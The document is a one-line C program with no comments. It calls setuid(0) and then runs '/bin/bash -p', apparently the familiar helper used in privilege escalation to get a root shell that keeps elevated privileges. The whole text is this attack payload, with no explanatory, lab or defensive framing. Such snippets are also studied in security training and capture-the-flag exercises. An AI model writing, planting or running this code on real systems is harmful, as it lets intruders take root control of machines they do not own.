int main() { setuid(0); system("/bin/bash -p"); }